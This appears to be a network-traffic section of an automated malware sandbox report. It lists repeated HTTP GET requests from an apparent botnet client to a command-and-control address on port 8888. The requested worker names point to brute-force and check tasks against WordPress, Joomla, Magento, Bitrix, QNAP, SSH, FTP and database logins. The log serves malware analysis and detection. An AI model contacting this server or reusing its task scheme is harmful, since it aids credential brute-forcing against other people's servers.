Source: global traffic	HTTP traffic detected: GET /gw?worker=whm_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=whm_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=whm_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ftpChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ftpChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=OCartBrt&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=OCartBrt&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=backup&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=OCartBrt&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=backup&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ftp_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ftp_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ftp_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ssh_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=backup&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ssh_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=backup&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=backup&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixBrt&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixBrt&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ftpChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=mysql_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=mysql_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ftpChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ftpChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixBrt&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixBrt&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixChk&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixBrt&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixChk&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ssh_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=postgres_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ssh_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ssh_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=postgres_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixChk&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=htpasswdChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixChk&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /project/active HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=mysql_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixChk&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=mysql_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=mysql_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=magentoChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=magentoChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=htpasswdChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=htpasswdChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=htpasswdChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=htpasswdBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=postgres_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=htpasswdChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=htpasswdBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=magentoBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=postgres_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=magentoBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=postgres_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=magentoChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=magentoChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixChk&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=htpasswdBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixChk&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=magentoChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=htpasswdBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=admfind HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=magentoBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=admfind HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=magentoBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=htpasswdBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=admfind HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixBrt&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixBrt&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=magentoBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=admfind HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpMagOcart HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixChk&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpMagOcart HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixChk&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=admfind HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=joomlaChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpMagOcart HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=joomlaChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixChk&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpMagOcart HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=Woo HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixBrt&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=Woo HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixBrt&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpMagOcart HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=Woo HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=joomlaBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=joomlaBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixBrt&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=Woo HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=qnapChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=joomlaChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=qnapChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=joomlaChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpChk&v=new HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=qnapChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=Woo HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpChk&v=new HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=joomlaChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=qnapBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=qnapChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=joomlaBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=qnapBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=joomlaBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=qnapChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=qnapBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=qnapBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=joomlaBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
